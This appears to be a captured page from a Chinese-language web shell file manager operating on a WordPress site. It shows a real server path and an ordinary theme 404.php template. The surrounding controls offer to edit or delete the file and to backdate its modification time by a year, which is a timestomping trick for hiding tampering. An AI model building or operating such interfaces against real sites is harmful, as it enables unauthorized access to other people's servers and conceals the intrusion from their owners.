文件操作 - 404.php
返回文件管理
返回主菜单
删除本文件
文件: /home/tecnoht/public_html/falegnameriabartesaghi--it/wp-content/themes/architek/404.php
编辑文件内容
<?php get_header(); architek_print_menu(); $architek_color_code = get_option("architek_style_color"); ?> <div class="notfounderrorbg"> <div class="container"> <div class="entry-header"> <div class="error-c"> <img src="<?php echo esc_url(get_template_directory_uri() . "/images/404errorimg2.png");?>" title="404"/> <br> <h1 class="heading-error"><?php if (function_exists('icl_t')){ wp_kses(printf(esc_html__( "%s", "architek" ), stripslashes_from_strings_only(icl_t( 'architek', 'Oops! There is nothing here...', get_option('architek_404_heading')))), 'post'); } else { wp_kses(printf(esc_html__( "%s", "architek" ), stripslashes_from_strings_only(get_option('architek_404_heading'))), 'post'); } ?></h1> <p class="text-error"><?php if (function_exists('icl_t')){ wp_kses(printf(esc_html__( "%s", "architek" ), stripslashes_from_strings_only(icl_t( 'architek', "It seems we can't find what you're looking for. Perhaps searching one of the links in the above menu, can help.", get_option('architek_404_text')))), 'post'); } else { wp_kses(printf(esc_html__( "%s", "architek" ), stripslashes_from_strings_only(get_option('architek_404_text'))), 'post'); } ?></p> <a href="<?php echo esc_url(home_url("/")); ?>" class="errorbutton"><?php if (function_exists('icl_t')){ printf(esc_html__("%s","architek"), icl_t( 'architek', 'GO TO HOMEPAGE', get_option('architek_404_button_text'))); } else { printf(esc_html__("%s","architek"), get_option('architek_404_button_text')); } ?></a> </div> </div> </div> </div> <?php if (get_option('architek_header_style_type') != 'style8' && get_option('architek_header_style_type') != 'style9' ) { ?></div><!-- fechar div main --><?php } ?> <?php architek_get_custom_inline_css(); get_footer(); ?>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件